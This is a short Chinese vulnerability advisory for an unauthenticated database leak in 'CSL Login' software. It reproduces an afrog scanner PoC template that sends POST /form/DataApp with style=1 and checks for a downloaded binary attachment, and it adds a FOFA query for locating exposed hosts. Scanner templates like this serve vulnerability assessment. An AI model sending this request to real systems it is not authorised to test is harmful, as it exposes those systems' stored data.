csl-login-unauth-db-leak: CSL Login unauthorized DB Leak

日期: 2025-08-01 | 影响软件: csl login | POC: 已公开

漏洞描述

fofa: "csl/login"

PoC代码[已公开]

id: csl-login-unauth-db-leak

info:
  name: CSL Login unauthorized DB Leak
  author: xpoc
  severity: high
  verified: true
  description: |-
    fofa: "csl/login"
  reference:
    - https://nosec.org/home/detail/3032.html
  tags: essl,leak
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /form/DataApp
      body: style=1
    expression: |
      response.status == 200 && 
      response.headers["content-type"].contains("application/binary") && 
      response.body.bcontains(b"ZK") && 
      response.raw_header.bcontains(b"attachment")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/csl-login-unauth-db-leak.yaml